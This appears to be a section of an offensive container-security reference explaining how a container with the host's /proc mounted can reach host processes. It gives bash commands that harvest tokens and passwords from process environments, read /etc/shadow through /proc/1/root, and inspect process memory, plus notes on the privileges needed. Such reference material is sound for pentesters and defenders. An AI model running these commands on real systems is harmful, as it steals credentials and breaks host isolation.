Host process access

With the host's /proc mounted in (or a shared host PID namespace), the container can inspect host processes through /proc/<pid>. That exposes process environments and memory, which routinely hold tokens and passwords, and /proc/<pid>/root, which is a doorway into the host filesystem through any host process.

bash
# Secrets from host process environments
for p in /proc/[0-9]*; do tr '\0' '\n' < "$p/environ" 2>/dev/null; done | sort -u | grep -iE 'token|secret|key|pass'

# The host root filesystem via init's root link
ls -la /proc/1/root/
cat /proc/1/root/etc/shadow 2>/dev/null

# Live memory of a host process (with ptrace rights or shared PID namespace)
cat /proc/<pid>/maps

Exploitation notes#

  • /proc/1/root resolves to the host root filesystem, so a mounted host /proc doubles as a host path mount even when no filesystem was bind-mounted.
  • Reading another process's memory directly needs CAP_SYS_PTRACE or a shared PID namespace; see Host PID namespace.
  • Environment and command-line reads need only the host /proc and matching UID or user-namespace mapping.

References#

Cookie Consent

We use cookies to enhance your experience. Learn more